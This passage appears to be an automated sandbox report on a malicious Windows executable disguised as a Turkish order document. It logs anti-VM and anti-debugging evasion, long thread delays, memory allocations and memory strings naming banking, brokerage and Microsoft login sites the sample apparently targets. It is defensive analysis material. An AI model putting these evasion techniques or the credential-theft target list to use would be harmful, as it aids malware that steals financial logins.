            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe PID: 7524, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: 1050000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: 2D90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: 7C40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: 8C40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: 8DF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: 9DF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: A150000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: B150000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: C150000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: D600000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: E600000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: F600000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: FCB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0177096E rdtsc 5_2_0177096E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3778Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 856Jump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\shutdown.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe TID: 7584Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0324C240 FindFirstFileW,FindNextFileW,FindClose,13_2_0324C240
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 3y36225.13.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: 3y36225.13.drBinary or memory string: global block list test formVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000340D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln'Id
            Source: 3y36225.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: 3y36225.13.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: 3y36225.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000002.2562812206.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 3y36225.13.drBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: 3y36225.13.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: 3y36225.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: 3y36225.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: 3y36225.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: AMC password management pageVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: 3y36225.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: 3y36225.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: 3y36225.13.drBinary or memory string: discord.comVMware20,11696497155f
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1358819440.000000000D530000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: BTQemuFc9M
            Source: 3y36225.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: 3y36225.13.drBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: 3y36225.13.drBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: 3y36225.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: 3y36225.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: 3y36225.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0177096E rdtsc 5_2_0177096E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00417E63 LdrLoadDll,5_2_00417E63
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172C156 mov eax, dword ptr fs:[00000030h]5_2_0172C156
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C8158 mov eax, dword ptr fs:[00000030h]5_2_017C8158
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736154 mov eax, dword ptr fs:[00000030h]5_2_01736154
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736154 mov eax, dword ptr fs:[00000030h]5_2_01736154
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C4144 mov eax, dword ptr fs:[00000030h]5_2_017C4144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C4144 mov eax, dword ptr fs:[00000030h]5_2_017C4144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C4144 mov ecx, dword ptr fs:[00000030h]5_2_017C4144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C4144 mov eax, dword ptr fs:[00000030h]5_2_017C4144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C4144 mov eax, dword ptr fs:[00000030h]5_2_017C4144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01760124 mov eax, dword ptr fs:[00000030h]5_2_01760124
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DA118 mov ecx, dword ptr fs:[00000030h]5_2_017DA118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DA118 mov eax, dword ptr fs:[00000030h]5_2_017DA118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DA118 mov eax, dword ptr fs:[00000030h]5_2_017DA118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DA118 mov eax, dword ptr fs:[00000030h]5_2_017DA118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_018061E5 mov eax, dword ptr fs:[00000030h]5_2_018061E5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F0115 mov eax, dword ptr fs:[00000030h]5_2_017F0115
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE10E mov eax, dword ptr fs:[00000030h]5_2_017DE10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE10E mov ecx, dword ptr fs:[00000030h]5_2_017DE10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE10E mov eax, dword ptr fs:[00000030h]5_2_017DE10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE10E mov eax, dword ptr fs:[00000030h]5_2_017DE10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE10E mov ecx, dword ptr fs:[00000030h]5_2_017DE10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE10E mov eax, dword ptr fs:[00000030h]5_2_017DE10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE10E mov eax, dword ptr fs:[00000030h]5_2_017DE10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE10E mov ecx, dword ptr fs:[00000030h]5_2_017DE10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE10E mov eax, dword ptr fs:[00000030h]5_2_017DE10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE10E mov ecx, dword ptr fs:[00000030h]5_2_017DE10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017601F8 mov eax, dword ptr fs:[00000030h]5_2_017601F8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE1D0 mov eax, dword ptr fs:[00000030h]5_2_017AE1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE1D0 mov eax, dword ptr fs:[00000030h]5_2_017AE1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE1D0 mov ecx, dword ptr fs:[00000030h]5_2_017AE1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE1D0 mov eax, dword ptr fs:[00000030h]5_2_017AE1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE1D0 mov eax, dword ptr fs:[00000030h]5_2_017AE1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F61C3 mov eax, dword ptr fs:[00000030h]5_2_017F61C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F61C3 mov eax, dword ptr fs:[00000030h]5_2_017F61C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B019F mov eax, dword ptr fs:[00000030h]5_2_017B019F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B019F mov eax, dword ptr fs:[00000030h]5_2_017B019F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B019F mov eax, dword ptr fs:[00000030h]5_2_017B019F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B019F mov eax, dword ptr fs:[00000030h]5_2_017B019F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804164 mov eax, dword ptr fs:[00000030h]5_2_01804164
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804164 mov eax, dword ptr fs:[00000030h]5_2_01804164
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172A197 mov eax, dword ptr fs:[00000030h]5_2_0172A197
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172A197 mov eax, dword ptr fs:[00000030h]5_2_0172A197
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172A197 mov eax, dword ptr fs:[00000030h]5_2_0172A197
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01770185 mov eax, dword ptr fs:[00000030h]5_2_01770185
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EC188 mov eax, dword ptr fs:[00000030h]5_2_017EC188
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EC188 mov eax, dword ptr fs:[00000030h]5_2_017EC188
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D4180 mov eax, dword ptr fs:[00000030h]5_2_017D4180
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D4180 mov eax, dword ptr fs:[00000030h]5_2_017D4180
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175C073 mov eax, dword ptr fs:[00000030h]5_2_0175C073
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01732050 mov eax, dword ptr fs:[00000030h]5_2_01732050
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B6050 mov eax, dword ptr fs:[00000030h]5_2_017B6050
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C6030 mov eax, dword ptr fs:[00000030h]5_2_017C6030
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172A020 mov eax, dword ptr fs:[00000030h]5_2_0172A020
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172C020 mov eax, dword ptr fs:[00000030h]5_2_0172C020
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E016 mov eax, dword ptr fs:[00000030h]5_2_0174E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E016 mov eax, dword ptr fs:[00000030h]5_2_0174E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E016 mov eax, dword ptr fs:[00000030h]5_2_0174E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E016 mov eax, dword ptr fs:[00000030h]5_2_0174E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B4000 mov ecx, dword ptr fs:[00000030h]5_2_017B4000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172C0F0 mov eax, dword ptr fs:[00000030h]5_2_0172C0F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017720F0 mov ecx, dword ptr fs:[00000030h]5_2_017720F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0172A0E3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017380E9 mov eax, dword ptr fs:[00000030h]5_2_017380E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B60E0 mov eax, dword ptr fs:[00000030h]5_2_017B60E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B20DE mov eax, dword ptr fs:[00000030h]5_2_017B20DE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F60B8 mov eax, dword ptr fs:[00000030h]5_2_017F60B8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F60B8 mov ecx, dword ptr fs:[00000030h]5_2_017F60B8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017280A0 mov eax, dword ptr fs:[00000030h]5_2_017280A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C80A8 mov eax, dword ptr fs:[00000030h]5_2_017C80A8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173208A mov eax, dword ptr fs:[00000030h]5_2_0173208A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D437C mov eax, dword ptr fs:[00000030h]5_2_017D437C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B035C mov eax, dword ptr fs:[00000030h]5_2_017B035C
